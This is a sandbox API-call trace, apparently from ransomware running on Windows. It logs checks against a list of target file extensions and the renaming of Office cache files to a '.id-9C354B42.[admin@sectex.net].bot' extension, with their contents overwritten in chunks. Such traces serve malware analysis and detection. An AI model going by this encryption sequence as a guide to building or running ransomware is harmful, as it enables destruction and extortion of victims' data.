	[0043.743] lstrlenW (lpString=".1cd") returned 4
	[0043.743] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0043.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.743] lstrlenW (lpString=".jpg") returned 4
	[0043.743] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0043.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.743] lstrlenW (lpString=".doc") returned 4
	[0043.743] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0043.743] lstrlenW (lpString=".docx") returned 5
	[0043.743] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0043.743] lstrlenW (lpString=".pdf") returned 4
	[0043.743] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0043.743] lstrlenW (lpString=".xls") returned 4
	[0043.743] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0043.743] lstrlenW (lpString=".xlsx") returned 5
	[0043.743] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0043.743] lstrlenW (lpString=".ppt") returned 4
	[0043.743] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0043.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.744] lstrlenW (lpString=".zip") returned 4
	[0043.744] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0043.744] lstrlenW (lpString=".rar") returned 4
	[0043.744] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0043.744] lstrlenW (lpString=".bz2") returned 4
	[0043.744] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0043.744] lstrlenW (lpString=".7z") returned 3
	[0043.744] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0043.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.744] lstrlenW (lpString=".dbf") returned 4
	[0043.744] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0043.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.744] lstrlenW (lpString=".1cd") returned 4
	[0043.744] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0043.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 78
	[0043.744] lstrlenW (lpString=".jpg") returned 4
	[0043.744] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0043.744] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0043.744] lstrlenW (lpString="VisioLR.cab") returned 11
	[0043.744] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0043.744] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=50823389) returned 1
	[0043.745] CloseHandle (hObject=0x1d0) returned 1
	[0043.745] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020
	[0043.745] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0043.745] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0043.745] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0043.745] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0043.745] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.745] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.750] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.750] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0043.753] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0043.753] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0043.753] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.053] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.053] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0044.069] SetEndOfFile (hFile=0x1d0) returned 1
	[0044.069] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0044.072] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.072] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.073] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.073] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.074] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.074] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.076] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0044.076] CloseHandle (hObject=0x1d0) returned 1
	[0044.076] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.076] lstrlenW (lpString=".doc") returned 4
	[0044.076] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString=".docx") returned 5
	[0044.077] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.077] lstrlenW (lpString=".pdf") returned 4
	[0044.077] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString=".xls") returned 4
	[0044.077] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString=".xlsx") returned 5
	[0044.077] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.077] lstrlenW (lpString=".ppt") returned 4
	[0044.077] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.077] lstrlenW (lpString=".zip") returned 4
	[0044.077] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString=".rar") returned 4
	[0044.077] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString=".bz2") returned 4
	[0044.077] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.077] lstrlenW (lpString=".7z") returned 3
	[0044.077] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.077] lstrlenW (lpString=".dbf") returned 4
	[0044.077] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.077] lstrlenW (lpString=".1cd") returned 4
	[0044.077] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.077] lstrlenW (lpString=".jpg") returned 4
	[0044.077] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.077] lstrlenW (lpString=".doc") returned 4
	[0044.077] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.077] lstrlenW (lpString=".docx") returned 5
	[0044.078] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.078] lstrlenW (lpString=".pdf") returned 4
	[0044.078] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.078] lstrlenW (lpString=".xls") returned 4
	[0044.078] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.078] lstrlenW (lpString=".xlsx") returned 5
	[0044.078] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.078] lstrlenW (lpString=".ppt") returned 4
	[0044.078] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.078] lstrlenW (lpString=".zip") returned 4
	[0044.078] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.078] lstrlenW (lpString=".rar") returned 4
	[0044.078] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.078] lstrlenW (lpString=".bz2") returned 4
	[0044.078] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.078] lstrlenW (lpString=".7z") returned 3
	[0044.078] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.078] lstrlenW (lpString=".dbf") returned 4
	[0044.078] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.078] lstrlenW (lpString=".1cd") returned 4
	[0044.078] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.078] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74
	[0044.078] lstrlenW (lpString=".jpg") returned 4
	[0044.078] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.078] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0044.078] lstrlenW (lpString="OneNoteMUI.msi") returned 14
	[0044.078] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0044.079] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=2503680) returned 1
	[0044.079] CloseHandle (hObject=0x1d0) returned 1
	[0044.079] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 0x2020
	[0044.079] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.079] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0044.079] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0044.079] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0044.080] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.080] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.084] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.084] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.092] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0044.092] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.357] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.372] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.372] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0108, lpOverlapped=0x0) returned 1
	[0044.388] SetEndOfFile (hFile=0x1d0) returned 1
	[0044.388] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0044.633] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.633] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.635] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.635] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.641] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.641] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.644] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0044.644] CloseHandle (hObject=0x1d0) returned 1
	[0044.644] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.644] lstrlenW (lpString=".doc") returned 4
	[0044.644] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0044.644] lstrlenW (lpString=".docx") returned 5
	[0044.644] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0044.644] lstrlenW (lpString=".pdf") returned 4
	[0044.644] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0044.644] lstrlenW (lpString=".xls") returned 4
	[0044.644] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0044.644] lstrlenW (lpString=".xlsx") returned 5
	[0044.644] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0044.644] lstrlenW (lpString=".ppt") returned 4
	[0044.644] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0044.644] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.644] lstrlenW (lpString=".zip") returned 4
	[0044.644] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0044.645] lstrlenW (lpString=".rar") returned 4
	[0044.645] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0044.645] lstrlenW (lpString=".bz2") returned 4
	[0044.645] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0044.645] lstrlenW (lpString=".7z") returned 3
	[0044.645] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0044.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.645] lstrlenW (lpString=".dbf") returned 4
	[0044.645] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0044.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.645] lstrlenW (lpString=".1cd") returned 4
	[0044.645] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0044.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.645] lstrlenW (lpString=".jpg") returned 4
	[0044.645] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0044.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.645] lstrlenW (lpString=".doc") returned 4
	[0044.645] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0044.645] lstrlenW (lpString=".docx") returned 5
	[0044.645] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0044.645] lstrlenW (lpString=".pdf") returned 4
	[0044.645] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0044.645] lstrlenW (lpString=".xls") returned 4
	[0044.645] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0044.645] lstrlenW (lpString=".xlsx") returned 5
	[0044.645] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0044.645] lstrlenW (lpString=".ppt") returned 4
	[0044.645] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0044.645] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.645] lstrlenW (lpString=".zip") returned 4
	[0044.645] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0044.646] lstrlenW (lpString=".rar") returned 4
	[0044.646] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0044.646] lstrlenW (lpString=".bz2") returned 4
	[0044.646] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0044.646] lstrlenW (lpString=".7z") returned 3
	[0044.646] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0044.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.646] lstrlenW (lpString=".dbf") returned 4
	[0044.646] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0044.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.646] lstrlenW (lpString=".1cd") returned 4
	[0044.646] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0044.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77
	[0044.646] lstrlenW (lpString=".jpg") returned 4
	[0044.646] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0044.646] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0044.646] lstrlenW (lpString="GrooveMUI.msi") returned 13
	[0044.646] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0044.647] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=2507776) returned 1
	[0044.647] CloseHandle (hObject=0x1d0) returned 1
	[0044.647] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi")) returned 0x2020
	[0044.647] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
